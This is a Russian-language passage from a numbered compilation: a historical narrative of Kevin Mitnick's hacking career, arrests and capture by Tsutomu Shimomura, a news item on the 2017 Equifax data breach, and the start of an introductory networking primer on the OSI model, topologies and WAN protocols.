шесть месяцев тюрьмы, которая и стала его подлинным университетом. К тому времени, когда он вышел оттуда, он знал о работе крупнейшей в мире компьютерной сети (телефонной системы) столько же, сколько лучшие специалисты в Bell Labs. Он научился создавать бесплатные номера, звонить с чужого номера, разъединять по своей воле линии и подслушивать любые разговоры. В хакерской среде он был известен под кличкой Кондор, взятой из фильма Поллака, где Роберт Редфорд играет человека, скрывающегося от ЦРУ, используя свои умения манипулировать телефонной системой. А для телефонной компании стал Джеймсом Бондом с нигде не учтенным номером, который оканчивался цифрами 007. На протяжении 80-х Митник оттачивал свое мастерство, разыгрывая телефонные и компьютерные practical jokes (в том числе и со своими друзьями), и успешно уклонялся от встречи с властями. Он поселился в калифорнийском городке Thousand Oaks с девушкой, с которой познакомился на компьютерных курсах в летней школе. Но спокойная жизнь продолжалась недолго. В декабре 1987 Митника снова аре-стовали на этот раз по обвинению в краже компьютерных программ из Santa Cruz Operation; приговор 3 года условно. Но не прошло и года, как последовал новый арест за кражу частного компьютерного кода из исследовательской лаборатории Digital Equipment Corp. в Пало Альта. Интересно, что сдал Митника его же друг и собрат по хакерским забавам Ленни ДиЧикко, с которым они больше года совершали ночные атаки на компьютеры Digital Equipment, пытаясь скопировать оттуда операционную систему VMS. Гово-рят, что когда агенты ФБР взяли Митника в многоэтажном garage parking'е (декора-ции чистый Голливуд!), Митник спросил ДиЧикко: Почему ты это сделал? Потому что ты угроза для общества, якобы ответил тот. Суд использовал схожую формулировку, отклонив ходатайство об освобождении Митника под залог. Помощник прокурора заявил: Этот человек очень опасен, и его нужно держать от компьютера подальше. А шеф отдела по компьютерным преступ-лениям лос-анджелесской полиции детектив Джеймс М. Блэк сказал буквально сле-дующее: Он на несколько порядков выше того, что характеризует рядового хакера. Ему дали год в тюрьме общего режима, из которого восемь месяцев он провел в одиночной камере. Кроме того, судья Мариана Р. Пфельцер назначила ему принудительный шестимесячный курс лечения от компьютерной зависимости, справедливо полагая, что хакер, лишенный возможности хакинга, будет испытывать сильнейшие психологические ломки. Федеральные обвинители добились также, чтобы Митника ограничили в пользовании телефоном в страхе, что он сможет каким-то образом получить доступ к внешнему компьютеру. Характеризуя психологию своего пациента, директор реабилитационной службы Гарриет Розетто подчеркивала компенсаторный характер его пристрастия: Хакинг дает Кевину чувство самоуважения, которого ему не хватает в реальной жизни. Алчность и стремление навредить тут ни при чем… Он словно большой ребенок, играющий в Темницы и драконов. Тем не менее, в качестве условия освобождения в 1990 году от него потребовали, чтобы он больше не притрагивался к компьютеру и модему. Его отпустили на испытательный срок и приставили к нему инспектора, надзи-рающего за его поведением. И тут стали происходить странные вещи… Телефон его надзирателя неожиданно сам собой отключился, к великому удивлению ничего о том не ведающей телефонной компании. На кредитном счете судьи стало твориться бог знает что. А из компьютера суда в Санта Круз исчезли всякие упоминания об аресте Митника и последовавшем приговоре… (Кроме того, согласно одному источ-нику, Митник вскоре нарушил подписку о невыезде и слетал в Израиль повидаться с друзьями-хакерами.) Вообще же Митник спокойно работал, занимаясь исследованиями и давая плат-ные консультации. Он стал вести здоровый образ жизни и к июню 1992 сбросил 100 фунтов (около 45 киллограммов). Лицо его потеряло землистую одутловатость, характерную для детей компьютерного подземелья. Он даже стал вегетарианцем… Но тут умер его брат (вроде бы, от сверхдозы героина), и Митник опять сорвался. В сентябре 1992 ФБР получило ордер на обыск квартиры Митника в Калабасасе, штат Калифорния. Он подозревался, в частности, в несанкционированном проникновении в компьютеры калифорнийского Департамента транспортных средств, который обвинил его в нанесении ущерба в $1 млн. (Сделал он это весьма просто: выдал себя за полицейского и получил в свои руки кучу секретной информации, включая водительские права вместе с фотографиями.) Власти считали также, что Митник приложил руку к взлому компьютерной системы армии, а также проник к фэбээров-ским досье. Но больше всего их интересовало, кто ведет подслушивание телефонных разговоров служащих из отдела безопасности в Pacific Bell. Митнику эти распросы не понравились, и он бежал. В ноябре на Митника был объявлен федеральный розыск. Но он как сквозь землю провалился. ФБР полагало, что он сфабриковал себе целый ряд удостоверений личности, что при его умениях было, в общем, раз плюнуть. Был даже арестован человек, ошибочно принятый властями за Митника. Но это был не он. На два с лишним года Митник исчез. Признаки его существования стали выплывать на поверхность где-то в середине 1994. Из компании Motorola сообщили, что кто-то скопировал из их компьютера программное обеспечение, позволяющее контролировать сотовую связь. Дэн Фармер, создатель нашумевшего SATAN'а (Security Administrator Tool for Analysing Networks) программы, ищущей дыры в компьютерных системах, сказал, что взломщик похитил раннюю версию его детища. Техника этих атак, по мнению ФБР, была характерна именно для Митника. В июле полицейские навестили в Лас-Вегасе бабушку и дедушку Кевина, надеясь уговорить их, чтобы они заставили своего внука образумиться. Его бабушка сказала, что он очень боится тюремного заключения. Те восемь месяцев, которые он отсидел в одиночке, он чувствовал себя ужасно. Однако на просьбу повлиять на Кевина они ответили, что это выше их сил. Власти чуть было не настигли Митника в октябре, расследуя жалобы McCaw Cellular Communication Inc. о том, что кракер похитил серийные электронные номера сотовых телефонов этой компании. Когда полиция ворвалась в квартиру Митника в Сиэттле, где он жил под вымышленным именем, она нашла несколько сотовых телефонов, учебники с изложением процедуры дублирования номеров и сканнер, с помощью которого Митник, вероятно, следил за операциями полиции по его поимке. Выяснилось, что последние три месяца он жил неподалеку от Вашингтонского университета и работал в местной больнице компьютерным техником. В Сиэттле он вел совершенно безобидную жизнь, заявил федеральный обви-нитель Айван Ортман, сообщивший также имя, которое использовал Митник Брайан Меррилл. Это был очень тихий, совершенно обычный человек, сказала Шерри Скотт, секретарь отдела, в котором работал Митник. Он никогда не говорил о своей личной жизни. Он просто приходил и занимался своим делом. И вот мы подходим к кульминационному моменту нашей истории. 25 декабря 1994 года, в рождественскую ночь, Митник вторгся в домашний компьютер Цутому Шимомуры ведущего американского специалиста по компьютерной безопасности, известного, в частности, своими разработками по предотвращению вторжения в компьютерные системы. Позже многие говорили, что Митнику просто не повезло он выбрал для нападения не того человека. Другие полагают, что Митник, одержимый своего рода манией величия, элементарно зарвался. Любопытна и третья точка зрения, которую высказал обозреватель Time Джошуа Киттнер: Митник устал быть мальчиком, затерянным в Киберпространстве, и бессознательно хотел, чтобы его наконец поймали. Как бы там ни было, события развивались так. В Рождество, когда Шимомура по-ехал на каникулах покататься на лыжах в Неваду, кто-то (мы уже знаем, кто именно) проник в его суперзащищенный домашний компьютер в Солана Бич, Калифорния, и начал копировать его файлы сотни засекреченных файлов. Один магистрант из Центра Суперкомпьютеров в Сан Диего, где работал Шимо-мура, заметил изменения в системных журнальных (log) файлах и быстро сообра-зил, что происходит. (Все это оказалось возможным благодаря тому, что Шимомура установил на свой компьютер программу, автоматически копирующую журналь-ные записи на дублирующий компьютер в Сан Диего.) Студент позвонил Шимому-ре, и тот помчался домой, чтобы провести инвентаризацию украденного. Пока он разбирался что к чему, обидчик нанес ему новое оскорбление. 27 декабря он прислал Шимомуре звуковое сообщение, где компьютерно-искаженный голос говорил: Ты мудак (Damn you). Моя техника самая лучшая… Разве ты не знаешь, кто я… Я и мои друзья… Мы убьем тебя. И как будто бы второй голос на заднем плане поддакнул: Точно, босс, твое кунг-фу очень клево (ехидный намек на национальность Шимомуры). Обидчивый самурай, известный своим ригоризмом и ненавистью к дурным манерам, поклялся отомстить обидчику, который нанес ему личное оскорбление, и поставил под вопрос его репутацию как специалиста. Для этого он задался целью реконструировать полную картину инцидента и понять, как можно изловить мародера, используя оставленные им электронные следы. Не вдаваясь в детали, техника нападения на компьютер Шимомуры была такова. Вначале хакер проник в дружественный компьютер в Университете Лайолы в Чи-каго. Дружественный означает, что данный компьютер имел санкцию на доступ к файлам в компьютере Шимомуры в Калифорнии. Весь фокус состоял в том, чтобы фальсифицировать исходный адрес системы, откуда поступали пакеты на шимому-ровский компьютер, что Митник с успехом и проделал. Атака было проведена необычайно искусно ведь Митнику приходилось работать вслепую. Известно, что когда система получает пакет, она посылает на компью-тер-отправитель сообщение, подтверждающее получение. Не будучи в состоянии видеть эти сообщения (ведь они поступали на компьютер, где он якобы находился), Митник смог, тем не менее, разгадать номера последовательностей и, тем самым, приписать соответствующие номера дальнейшим посылаемым пакетам. (Теоретиче-ская возможность этого была предсказана Стивом Белловином из Bell Labs еще в 1989, однако атака Митника первый известный случай применения этой техники на практике.) Скачав файлы Шимомуры (в частности, программы обеспечения компьютерной безопасности), Митник перекинул их на бездействующий эккаунт в The Well калифорнийской компании, предоставляющей доступ к Интернету. Когда Шимомура разобрался в том, что произошло, он рассказал об использованной кракером технике на конференции в Сономе, Калифорния, а также предал гласности технические детали нападения. Он всегда был сторонником открытого обсуждения изъянов в системах, хотя многие считали, что это лишь поощряет хакеров. CERT (Computer Emergency Response Team) разослал по сети сообщения, предупреждая системных администраторов, что подобная неприятность может случиться и с ними, и призвал их к бдительности. Шимомура же переключился на то, чтобы установить, кто именно взломал его систему. 27 января системный оператор The Well обратил внимание на необычно большое количество данных на эккаунте, который обычно был почти пуст. Он связался с од-ним из владельцев эккаунта Брюсом Кобаллом, программистом из Computers, Freedom and Privacy Group. Кобалл испытал шок, увидев у себя файлы Шимомуры, и вскоре позвонил ему. (Позже техники из The Well обнаружили еще десяток эккаун-тов, используемых хакером, большей частью спящих, где он хранил украденную им информацию.) Затем, когда на эккаунте Кобалла обнаружили файлы с паролями и кодами многих компаний, включая более 20 тыс. номеров кредитных карточек, украденных из NetCom Inc. (еще один провайдер онлайновых услуг), в игру включились федеральные власти. ФБР составило список подозреваемых, и Митник шел в этом списке одним из первых. Во-первых, взлом шимомуровского компьютера был, по всей видимости, демонстрацией силы и не преследовал денежных целей. Во-вторых, хакер придерживался правила не хранить данных, которые могут его изобличить, на своей собственной машине. Главной же наводкой оказались файлы программ для манипулирования сотовым телефоном. Коды сотовых телефонов заинтриговали нас, сказал Шимомура, поскольку мы знали, что Кевин был охоч до них. Чтобы как-то расшевелить человека, вторгшегося в его систему, Шимомура разослал по ньюсгруппам запись его голоса в виде звукового файла. Приманка сработала на автоответчик Шимомуры пришло еще одно насмешливое послание: Ах, Цутому, мой образованный ученик, я вижу, ты разослал по сети мой голос… Я очень огорчен, сын мой... Шимомура установил на The Well круглосуточный мониторинг, позволяющий засекать любую необычную активность. С помощью команды помощников из ФБР и Национального агентства безопасности он терпеливо отслеживал все действия хакера и маршрут, который прошли его компьютерные сообщения. Было установлено, что хакер во многих городах использовал публичные компьютеры, которые дают пользователю возможность получить доступ к системе, не платя за междугороднюю связь. Как плацдарм для своих атак он использовал NetCom. Анализируя пути сообщений и интенсивность траффика в разных местах, Шимомура пришел к выводу, что хакер находится где-то в районе аэропорта Дурхейм близ города Ралейх в Северной Каролине. Федеральные агенты засекли для Шимомуры телефонную связь в Ралейхе, но оказалось, что линия вновь и вновь замыкается на себя, как бы не имея начала. Тем не менее, район поиска оказалось возможным сузить до двухкилометровой зоны. 12 февраля Шимомура вылетел в Ралейх (как писали в газетах, в спешке забыв запасные носки). Группа по выслеживанию Митника, которую он возглавил, включала федеральных агентов, инженеров из Sprint Cellular, а также известного журналиста из New York Times Джона Маркоффа, автора книги Киберпанк (написанной в соавторстве с его тогдашней женой Кати Хефнер), посвященной Митнику и другим хакерам. (Сам Маркофф позже признавал, что делился с Шимомурой информацией о привычках Митника, но отрицал, что входил в поисковую команду, настаивая на том, что он действовал всего лишь как репортер.) Группа патрулировала улицы на автомобилях, снабженных устройством для перехвата частот сотовых телефонов. Опасаясь, что Митник может подслушивать сообщения, которыми обмениваются полицейские, Шимомура настоял на том, чтобы все рации поисковой группы в районе Players Club месте, в котором, как они полагали, находится объект их поиска, были отключены. Эта предосторожность оказалась не напрасной… В конце концов Митника засекли. Поздним вечером 14 февраля, в Валентинов день, федеральный судья Уоллас Диксон подписал ордер на обыск квартиры 202 в Player Club, которую Митник снимал с начала февраля, используя имя Гленн Томас Кейз. 15 февраля, в 1.30 ночи, когда Шимомура определил, что Митник вышел на связь, агенты постучались в дверь. Через несколько минут Митник отворил дверь и был арестован. Когда Шимомура и Митник впервые встретились лицом к лицу на предварительном судебном слушании в Ралейхе, Митник взглянул на Шимомуру и сказал: Здравствуй, Цутому. Я уважаю твое мастерство. Шимомура в ответ не сказал ни слова и лишь высокомерно кивнул. Позже, давая интервью, Шимомура заявил: Из того, что я видел, мне он не кажется таким уж большим специалистом. И добавил: Проблема не в Кевине, проблема в том, что большинство систем действительно плохо защищены. То, что делал Митник, остается осуществимым и сейчас. Шимомура не особенно противится, когда его пытаются представить героем, одолевшим злодея, наводящего ужас на обитателей Киберпространства. Но то, что Митник оставил за собой следы, по которым его могли поймать, кажется ему проявлением дурного вкуса. По его словам, единственное чувство, которое он испытывает по отношению к Митнику, это жалость. Мне кажется, что власти могли бы сделать что-нибудь более изящное, чем просто посадить его за решетку. Митника, тем не менее, посадили. К октябрю 1995 Митник сменил три тюрьмы одна другой хуже, если судить по его письмам. В первой он был избит и ограблен двумя сокамерниками и едва избежал столкновений с другими. Когда он написал жалобу, что вегетарианская диета, которую он затребовал, свелась к бутербродам с арахисовым маслом, и что ему отказались выписать лекарства против стресса и желудочных болей, начальство распорядилось перевести его в тюрьму более строгого режима. В новой тюрьме у него первым делом конфисковали книги, нижнее белье и туалетные принадлежности. Ему вновь было отказано в лекарствах, и после того как 18 июня он был госпитализирован с диагнозом спазмы пищевода, его адвокат заявил, что намеренное игнорирование серьезных медицинских нужд его подопечного является нарушением конституционных норм. Однако прежде чем федеральный судья успел дать ход этой жалобе, Митник был переведен в третью по счету тюрьму. Там условия оказались еще хуже. Кроме него, в камере было еще семь заключенных. В тюрьме отсутствовала юридическая библиотека (что вообще-то предполагается федеральным законодательством). В камере не было ни радио, ни телевизора. Каждому заключенному позволялось иметь одновременно не более двух книг. На восемь человек в камере приходился единственный карандашный огрызок, который отбирался после обеда. Митнику выдавали по одному листу бумаги в день. А на воле тем временем Митника склоняли и так и этак. На конференции, посвященной проблемам компьютерной безопасности, проходившей 28 марта 1995 года в Берлингаме, Калифорния, Кари Хекман сравнил вызов, который Митник бросил специалистам по безопасности, с вызовом, каким явился для США в 1958 году запуск русскими спутника (Митник спутник: сама собой напрашивающаяся игра слов). На свободе он оказался только лишь 21 января 2000 года. Кевин по-прежнему считает себя невиновным, хоть и признается что занимался компьютерным взломом, но делал он это не с целью обогащения, а просто ради удовольствия. Но даже выйдя на свободу, Митник еще целых три года не имел права пользоваться компьютерами, сотовыми телефонами и прочими информационными устройствами. В 2003 году вышла в свет книга Митника Искусство лжи (Art of Deception), мгновенно ставшая бестселлером и разошедшаяся тиражом в 200 000 экземпляров за несколько месяцев. Кевин Д. Митник выступил в качестве рецензента книги, которую Вы держите в руках. Комментируя ее содержание, он с улыбкой заметил Джо Гранду (автору этой книги) Если бы эта книга была у меня 10 лет назад ФБР бы меня не нашло!
  16. В ночь с 7 на 8 сентября 2017 года стало известно о взломе компании Equifax и одной из самых масштабных утечек данных за последние годы. Так, представители североамериканского подразделения Equifax сообщили, что неизвестные злоумышленники завладели личной информацией 143 млн человек (всего в США проживает 324 млн человек), включая номера социального страхования и водительских удостоверений, полные имена, адреса и так далее. Кроме того, в 209 000 случаях в документах также фигурировала информация о банковских картах пострадавших. Судя по всему, отделения Equifax в других странах не пострадали, хотя сообщается, что утечка затронула неназванное количество жителей Канады и Великобритании. В случившемся есть определенная ирония, так как специалистов Equifax регулярно нанимают для защиты пользовательских данных после утечек данных. «Вы почувствуете себя более защищенными с Equifax. Мы являемся ведущим поставщиком услуг в сфере защиты утечек данных и ежедневно обслуживаем более 500 организаций, столкнувшихся с утечками информации», — гласит сайт компании. Официальные представители Equifax сообщили, что неизвестные проникли на серверы компании еще в мае 2017 года, но их присутствие оставалось незамеченным вплоть до конца июля 2017 года. Никаких подробностей об атаке не сообщается, известно лишь, что злоумышленники скомпрометировали некое веб-приложение на сайте. Почему представители Equifax молчали о случившемся более месяца, неизвестно. Для пострадавших был запущен специальный сайт equifaxsecurity2017.com, где можно найти ответы на наиболее распространенные вопросы, а также подать заявление на использование бесплатного кредитного мониторинга и воспользоваться сервисами по защите от кражи личности. Также на сайте trustedidpremier.com/eligibility/ клиенты компании могут проверить, числятся ли их данные в списках пострадавших. Журналисты Vice Motherboard уже раскритиковали компанию за создание путаницы из трех разных сайтов (еще есть официальный equifax.com). Более того, представители издания обнаружили, что защита от кражи личности TrustedID Premier работает весьма странно. В частности, как показывает скриншот ниже, система попросила некоторых сотрудников редакции вернуться для активации TrustedID Premier через неделю. Другим журналистам система сообщила, что их данные не пострадали, но после повторного запроса их тоже попросили вернуться позже. «Это определенно очень печальное событие для нашей компании, которое уявзляет саму суть того, что мы делаем и кем являемся. Я приношу извинения нашим клиентам и бизнес-партнерам за те неудобства и беспокойство, которое причяет им данный инцидент», — говорит CEO Equifax Ричард Смит (Richard Smith) в своем видеообращении. Компания Equifax основана в еще в 1899 году. На сегодняшний день бюро кредитных историй собирает и хранит информацию более чем 800 млн потребителей и более 88 млн компаний по всему миру.
  17. Различные типы сетей все плотнее интегрируются в нашу жизнь, хотя мы этого порой даже не замечаем, в то время как они раскрывают перед нами все более широкие возможности. Кто-то про себя подумает: «Да не нужны мне эти буржуйские штучки!», — и будет неправ. В ближайшее время всевозможные сети опутают нашу жизнь со всех сторон. Все, начиная от общения, заканчивая удаленным управлением бытовыми устройствами у нас дома и на работе, будет управляться по сети. У кого сейчас нет сотового телефона, в то время как еще 4 года назад они были не так уж и распространены. Так в ближайшие годы не останется человека без ноутбука с беспроводной технологией Wi-Fi. Уже сейчас вы можете проверять факсы и почту, пришедшие на ваш домашний телефонный номер удаленно. Если учесть, что все они могут коммутироваться между собой и на аппаратном уровне могут быть интегрированы в любые устройства, то их возможности практически безграничны. Вы, например, сможете на расстоянии проверять готовкой пищи в микроволновой печи, с компьютера проверять безопасность у вас в квартире, смотреть за ребенком, оставшимся одним дома. Естественно, за прокладку и настройки таких сетей в ближайшие годы вы выложите кругленькую сумму, но есть вариант все сделать самому, что гораздо выгоднее и приятнее. За последнее время появилось большое количество новых стандартов в области сетей. Это породило немало споров и замешательства. Чтобы уметь строить собственные сети или хотя бы уметь настраивать существующие, необходимо понимание принципов работы сетей. Чтобы разобраться в существующей ситуации с сетями, мы предлагаем этот материал. Классификация Все вычислительные сети (ВС), в основном, классифицируются по географическому признаку. Они подразделяются на локальные (LAN), региональные (MAN) и глобальные (WAN). LAN работают на территории одного здания или части города. В качестве среды передачи данных используется «витая пара» (UTP), коаксиальный кабель и иногда оптоволокно («оптика» в просторечье). MAN объединяет локальные сети и как правило, использует оптоволокно. WAN, в отличие от предшественников имеет низкую скорость передачи данных и большее количество ошибок передачи. Для этого используются средства телекоммуникации: телефонные линии, спутниковые средства и микроволновые передатчики. По способу разделения ресурсов ВС могут быть одноранговыми, клиент-серверными (с выделенным сервером) и смешанными. В одноранговых сетях все компьютеры равноправны и отсутствует централизованное управление ресурсами и службами на компьютерах. В каждый конкретный момент каждый компьютер может быть сервером или клиентом, предоставляя или используя ресурсы других компьютеров. Такие сети имеют смысл при наличии в сети 5-15 компьютеров и отсутствии единых распределяемых приложений. При работе с выделенным сервером используется клиент-серверная схема, которая позволяет централизованно обеспечивать безопасность и управление, предоставлять централизованное хранилище ресурсов и обеспечивать различные сервисы (например, Web-сервисы, распределенное использование приложений). Такая система более сложна в обслуживании, но предоставляет гораздо больше удобства, безопасности и хорошо масштабируется. Способ, с помощью которого сообщение обрабатывается структурными элементами (каналами связи и интерфейсами) и передает­ся по сети, называется сетевым протоколом. Проблемы совмеще­ния различных элементов ВС привели Международ­ную организацию стандартизации ISO к созданию эталонной модели архи­тектуры ВС OSI. В модели OSI принят принцип слоистой архитектуры, в которой все функции сети разделены на уровни таким образом, что вышележащие уровни используют услуги по переносу информации, предоставляемые нижележащими уровнями, т. е. взаимодействуют через интерфейс, который должен сохраняться, а сами уровни могут быть заменены в любой момент. Единственной проблемой может служить тот факт, что некоторые фирмы производители к тому времени уже разработали и внедрили свой стандарт, который может вписываться, а может несколько отличаться от модели OSI Модель OSI Итак, эта эталонная модель распределяет сетевые функции по семи уровням: Уровень 7. Прикладной Уровень 6. Представления данных Уровень 5. Сеансовый Уровень 4. Транспортный Уровень 3. Сетевой Уровень 2. Канальный Уровень 1. Физический При передаче информации в модели OSI используется 3 типа адресов: Физический адрес или MAC-адрес, который записывается изготовителем на сетевой плате и однозначно определяет физическое устройство. Служебный (логический) адрес, определяющий порт или сокет для служб провайдера или сервера. Сетевой (логический) адрес, который определяет сегмент сети, к которому присоединено устройство и его логический порядковый номер в сегменте. 7 уровень ПРИКЛАДНОЙ 6 уровень ПРЕДСТАВИТЕЛЬСКИЙ 5 уровень СЕАНСОВЫЙ 4 уровень ТРАНСПОРТНЫЙ 3 уровень СЕТЕВОЙ 2 уровень КАНАЛЬНЫЙ LLC MAC 1 уровень ФИЗИЧЕСКИЙ Таблица 1. Многоуровневая архитектура связи На физическом уровне определяются характеристики электри­ческих сигналов, напряжения, механические свойства кабелей и разъемов. На этом уровне определяется физическая топология сети, способ ко­дирования информации и общей синхронизации битов. Данные на этом уровне рассматриваются как прозрачный поток битов. Топология сетей описывает физическое расположение программно-аппарат­ных компонентов (физическая топология) и методы перемещения данных в среде (логическая топология). К ним относятся: общая шина (bus); кольцо (ring); сотовая (cellular); полносвязная (mesh). звезда (star); Комбинация этих топологий дает гибридную топологию (звезда на общей шине, звезда на кольце). Именно эта топология наиболее часто встречается в современных сетях. При выборе топологии необходимо учитывать множество факторов, таких, как расстояние, цена, вопросы безопасности, планируемая к использованию операционная система, использование сущест­вующего оборудования и т. д. В системах с топологией общая шина сетевые адаптеры под­ключены параллельно к единственному каналу связи — магистра­ли. Управление шиной может быть как централизованное (станцией-арбитром), так и распределенное (равноправное). Одной из самых известных сетей с общей шиной является Ethernet фирмы Xerox на коаксиальном кабеле. Шинная топология представляет собой быстрейший и про­стейший способ установки маленькой или временной сети. К недостаткам такой топологии следует отнести уязвимость при неполадках в магистральном кабеле и трудность изоляции от­дельных станций или других компонентов при неправильной ра­боте. Для кольцевых систем характерно наличие однонаправленно­го замкнутого канала связи, который разрывается сетевыми уст­ройствами доступа (интерфейсами). Посланное одним интерфей­сом сообщение последовательно проходит по кольцу от одного узла к другому, пока не доберется до узла-получателя или не вер­нется к своему отправителю. Классификация кольцевых систем основывается на примене­нии разных методов множественного доступа. Наиболее известны петли с жезловым (маркерным) управлением, которое реализовано в сети Token Ring фирмы IBM и волоконно-оптической сети FDDI (Fiber Distributed Data Interface), имеющей пропускную способность 100 Мбит/с и использующей топологию двойного (избыточного) кольца. В случае повреждения одного из них сеть автоматически переконфигурируется. Топология кольца имеет ряд недостатков: его трудно поддер­живать и переконфигурировать в больших сетях. Кроме того, не­поладки в кабеле или одной станции кольца фатальны для всего кольца. Сети со звездной топологией имеют в качестве центрального узла концентратор, который как бы тиражирует пришедшее по одной из линий связи сообщение и рассылает его всем остальным станциям сети. Таким образом, организуется широковещательная передача. В качестве примера подобных сетей можно привести сеть Fast Ethernet на витой паре со скоростью передачи 100 Мбит/с. К достоинствам таких топологий следует отнести прекрасное масштабирование, независимость работоспособности всей сети от неполадок на отдельной станции или фрагменте кабельной систе­мы, относительная простота расширения сети и ее реконфигурирования. Недостатками топологии является необходимость большого количества кабеля, больше, чем при остальных топологиях, и за­висимость работоспособности сети от концентратора. Сети с топологией в виде сот определяют принципы беспро­водной связи для географических областей, разделенных на ячей­ки (соты). Каждая ячейка представляет собой часть общей облас­ти, внутри которой функционируют конкретные соединения, свя­зывающие устройства с центральной станцией. Центральные станции соединены в виде сетки. В этом случае при пересылке информации существует множество альтернативных маршрутов, что позволяет поддерживать отказоустойчивость сети, оптимизи­ровать нагрузку при передаче и гарантировать минимальную за­держку при доставке сообщений. Пример таких сетей Wi-Fi и Wi-Max, которые уже разворачиваются в Москве и Санкт-Петербурге, а также сети сотовой связи. Физический уровень определяет, что вся информация в сетях передается виде пакетов, т.е. частей одного сообщения. Между пакетами посылается служебная информация и пакеты других сообщений. Таким образом, пользователям кажется, что их данные передаются одновременно. На самом деле, почти все сети в мире являются сетями с коммутацией пакетов. Способов коммутации множество, но основные из них два: установления виртуального соединения с подтверждением приема каждого пакета и передача дейтаграмм. Установление виртуального соединения (канала) является гораздо более надежным способом обмена информации. При таком соединении, если пакет принят неправильно или испорчен (например, из-за помех в линии), то отправитель повторяет передачу. Дейтаграммы (короткие сообщения) пересылаются адресату без подтверждения получения каждой из них. О получении всего сообщения извещает целевая программа. Для определения начала и конца пакетов используются управляющие служебные поля пакета с информацией о длине данных, фиксированная длина кадра или битстаффинг (включение 0 после каждой последовательности из 6 единиц, в том числе после заголовка и конца кадра). Физический уровень определяет физические характеристики используемой среды передачи данных (коаксиальный кабель, витые пары, оптово­локно), организованной с помощью различных топологий. Он описывает также коммуникации с помощью радиосвязи и инфракрасных лучей (беспроводные сети), оптоволоконные кабели и кабель RS-232, используемый для подключе­ния модемов к компьютерам. Канальный уровень определяет правила совместного ис­пользования узлами сети физического уровня. Протоколы этого уровня определяют, каким образом биты информации организу­ются в логические последовательности (кадры, фреймы), и распо­ложение и вид контрольной информации (заголовки и концевики). Этот уровень структурирован по двум подуровням: управлению доступом к среде — MAC (Media Access Control) и управлению ло­гической связью — LLC (Logical Link Control). МАС-подуровень поддерживает множественный доступ к каналу связи, осуществляет прием и передачу информационных и управляющих кадров, обнаруживает ошибки по проверочной по­следовательности кадров либо по его длине. Физический MAC-адрес сетевой карты помещается в заголовок кадра и используется для идентификации приемника и/или источника. На подуровне LLC определяется класс обслуживания, осуществляется контроль ошибок передачи, синхронизация кадров. Сетевой уровень определяет, как передаются данные (пакеты). Как правило, прото­колы этого уровня дейтаграммные, но обеспечивающие высокую производительность сети. Прежде всего, они используются для получения служебной информации, такой как адреса для маршрутизации сообщений в многосегментной ЛВС, так как маршрутизаторы работают на сетевом уровне. Транспортный уровень обеспечивает наивысший уровень управления процессом перемещения данных из одной системы в другую. С помощью обнаружения и коррекции ошибок транс­портный уровень обеспечивает качественную и точную доставку. Этот уровень обеспечивает получение всех данных и правильную очередность следования пакетов. На этом уровне между системами устанав­ливается виртуальная связь. Во время сеанса передачи две системы сами поддерживают передачу данных. Уровень сеанса координирует обмен информацией между систе­мами. Этот уровень называется так по устанавливаемому и завер­шаемому сеансу коммуникации. Если одна система работает медленнее другой или пакеты передаются не в том порядке, то требуется координация. На уровне сеанса к пакетам добавляется информация, которую используют коммуникационные протоколы и которая слу­жит для поддержания сеанса до завершения передачи. Уровень представления. Протоколы на уровне представления являются частью операционной системы и приложений, которые пользователь выполняет на компьютере. На этом уровне ин­формация форматируется для вывода на экран и печати, также происходит кодирование данных, форматирование, сжатие и т. д. Прикладной уровень обслуживает запро­сы пользователей сети на совместно используемые услуги (элек­тронная почта, файлы и печать, базы данных и т. д.), организует санкционированный доступ к запрашиваемым ресурсам, защища­ет сеть от вторжения нарушителей. Пользователи дают команды запроса на сетевые устройства, которые оформляются в пакеты и передаются по сети с помощью протоколов более низкого уровня. Стандарт IEEE 802 Расширяя физический и канальный уровень, стандарт сетевых коммуникаций Института инженеров в области электротехники и электроники IEEE 802, разработанный для физических компонентов сети, определяет, каким образом сетевой адаптер получает доступ к сетевому кабелю и как он передает данные. В описание стандарта входят интерфейсные платы, мосты, маршрутизаторы и другие компоненты, используемые для создания сетей с применением коаксиального кабеля или «витой пары». Сюда включаются также глобальные сети, использующие общие носители, такие, как телефонная система. Стандарт 802 объединяет 16 компонентов, нас интересуют следующие: 802.3 локальные сети CSMA/CD — множественный доступ с оп­ределением несущей и определением конфликтов (фактически Ethernet); 802.6 региональные сети MAN (Metropolitan Area Network); 802.8 техническая консультационная группа по оптоволоконным сетям; 802.11 беспроводные сети; 802.16 беспроводной широкополосный доступ. Стандарты 802.3-802.7 позволяют компью­терам и устройствам многих независимых поставщиков логически связываться друг с другом с помощью «витой пары», коаксиально­го кабеля или других типов носителя. На каждом из выше перечисленных уровней модели OSI работают свои протоколы, владение которыми и составляет работу администратора сети. Понимание взаимодействия протокола с сетью позволяет вам создавать сети, начиная с домашней ЛВС, заканчивая большими сетями с гибридной топологией. Для этого требуется не только умение настраивать протоколы, но и умение на физическом уровне соединять сегменты сети. Протоколы WAN Протоколы ГВС позволяют связывать между со­бой на больших расстояниях не только отдельные компьютеры, но и ЛВС. SLIP. Протокол для последовательных линий SLIP был спро­ектирован для обеспечения связи с сетями ТСР/IP через публич­ную телефонную сеть. В настоящее время этот протокол используется для связи по телефону с Ин­тернет-провайдером в Unix-системах. SLIP действует на физическом уровне модели OSI. Несмотря на простоту реализации, этот протокол обладает рядом недостатков: поддерживает только IP в качестве транспорта; не поддерживает согласование IP-адресов; не обеспечивает аутентификацию. РРР. Протокол соединения РРР точка-точка используется как альтернатива SLIP. Он обладает рядом возможностей физиче­ского и канального уровней. К его достоинствам относятся: контроль ошибок; поддержка транспортов TCP/IP, IPX/SPX, NetBIOS; согласование адреса IP поддержкой протокола динамической конфигурации узла DHCP; пароль для регистрации входа. Протокол РРР наиболее популярен для телефонного доступа в Интернет. Х.25. Протоколы Х.25, предназначенные только для передачи данных, описывают взаимодействие на физическом, канальном и сетевом уровнях, отличаются повышенной надежностью и используются, в основном, в банковских сетях. Frame Relay. Сеть с ретрансляцией кадров Frame Relay исполь­зует установление постоянного виртуального канала PVC между конечными точками для переноса данных. Сеть действует на скоростях от 56 Кбит/с до 1,544 Мбит/с. Линии T1 и ТЗ. Цифровая линия Т1 представляет собой двух­точечную технологию передачи, которая состоит из 24 каналов по 64 Кбит/с каждый, т. е. 1,5 Мбит/с общей пропускной способ­ностью. Более быстрая линия называется ТЗ и представляет собой эквивалент 28 линий Т1 с общей скоростью передачи данных и голоса 44,736 Мбит/с. Расходы по ежемесячному обслуживанию таких линий доста­точно высоки, поэтому возможна аренда только части полосы пропускания в виде нескольких каналов. ISDN. 